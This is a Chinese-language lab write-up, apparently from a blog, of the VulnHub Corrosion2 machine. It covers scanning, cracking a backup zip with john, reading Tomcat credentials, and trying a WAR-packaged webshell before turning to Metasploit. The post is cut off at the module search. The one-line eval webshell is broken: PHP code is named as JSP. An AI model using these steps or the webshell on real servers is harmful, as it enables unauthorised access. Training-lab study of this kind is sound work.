Corrosion2实战渗透(一)

简介: Corrosion2实战渗透

靶机下载:

https://download.vulnhub.com/corrosion/Corrosion2.ova


实验环境


靶机:192.168.43.4

攻击机:192.168.43.123

 image.png


工具:

netdiscover      主机发现

nmap                端口扫描

dirsearch          目录扫描

msfconsole      集成工具  

unzip                解压

zip2john           提取密码信息

john                  爆破

vi                       编辑器


信息收集

netdiscover 192.168.43.0/24
arp-scan -l
nmap 192.168.43.0/24


三选一即可

 image.png

image.png

 

发现目标靶机


 image.png

 

端口扫描


nmap -A 192.168.43.4 -sS -sV -T4


image.png

 

端口发放情况为

22         /tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80         /tcp open  http    Apache/2.4.41 (Ubuntu)

8080     /tcp open  http    Apache Tomcat 9.0.53

 

渗透思路:

1.OpenSSH 8.2p1

命令注入漏洞(CVE-2020-15778)(高危)

OpenSSH 8.4p1及之前版本中的scp的scp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。

(115条消息) OpenSSH 命令注入漏洞(CVE-2020-15778)复现_~TQT~的博客-CSDN博客_openssh漏洞复现

3. Apache Tomcat 9.0.53   版本较高

暂未发现公开漏洞

访问80端口  8080端口

可以尝试弱口令登录试试

 

登录服务


192.168.43.4:80

 image.png

192.168.43.4:8080

image.png 

 

 

实战步骤:


1.目录扫描80端口的


python dirsearch.py -u http://192.168.43.4/

image.png

 

并未发现特殊的利用目录


2.目录扫描8080端口


python dirsearch.py http://192.168.43.4:8080/


image.png

 

发现特殊目录,readme.txt,backup.zip


访问看看readme.txt,这句话的意思是在服务器上留下了密码

嘿,兰迪!它是您的系统管理员。我在服务器上给你留了个文件,肯定没人能找到。记得用我给你的密码。

 

image.png


访问backup.zip


发现下载下来一个压缩包文件,试着破解他


image.png 

 

3.破解压缩包


cd download
ll
unzip backup.zip
//密码未知


image.png


使用破解工具暴力破解
zip2john backup.zip > password_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt password_hash.txt  
//注意,需要建rockyou.txt解压,不然无法找到


image.png


由此可以破解出backup.zipde 密码


@administrator_hi5     (backup.zip)
解压backup.zip
unzip backup.zip
ll


image.png


可以看到tomcat的 tomcat-users.xml 文件

打开看看


cat  tomcat-users.xml 

image.png


发现tomcat的账号和密码,用这个登录tomcat服务


user username="manager"
password="melehifokivai"
roles="manager-gui"/>
user username="admin" 
password="melehifokivai" 
roles="admin-gui, manager-gui"/>

4.登录tomcat尝试上传war包反弹shell


新建一句话木马shell.jsp
<?php
eval @eval($_post['shell'])
;?>
打包成war包   jar  cvf shell.war shell.jsp


上传war包

反弹shell


image.png


访问shell失败,说明无法远程解析连接


image.png

重新换一种方式反弹shell


漏洞攻击


1.利用msf 的Tomcat 上传webshell的模块,有用户名和密码就可以使用:

msfconsole


image.png


search tomcat upload   //搜索攻击模块

image.png


相关文章
|
SQL 安全 前端开发
最近的一次渗透
最近的一次渗透
|
3月前
|
SQL 安全 测试技术
Web安全-渗透基础
Web安全-渗透基础
39 1
|
7月前
|
缓存 监控 安全
近源渗透
近源渗透
259 1
近源渗透
|
7月前
|
安全 应用服务中间件 PHP
黑客渗透知识点总结
黑客渗透知识点总结
|
安全 NoSQL Shell
梦中的一次渗透
昨天晚上一直做梦,今天就把昨天梦中的事情记录下来,本故事纯属虚构,如有雷同纯属巧合
83 0
|
安全 数据安全/隐私保护
网站渗透思路总结
网站渗透思路总结
120 0
|
Go 数据安全/隐私保护
某教程学习笔记(一):21、后渗透攻击
某教程学习笔记(一):21、后渗透攻击
139 0
某教程学习笔记(一):21、后渗透攻击
|
SQL 安全 API
【实战案例】——实战渗透某不法网站
很多同学在靶场,ctf题中取得了很大的进步和收获,但是在实战环境下这些知识却不一定好用,所以新开了一个专栏介绍博主遇到的一些比较有意思的实战环境和渗透流程,希望对大家有所帮助
146 0
【实战案例】——实战渗透某不法网站
|
安全 Shell 应用服务中间件
|
SQL 运维 安全
安全渗透环境准备_1 | 学习笔记
快速学习 安全渗透环境准备_1
139 0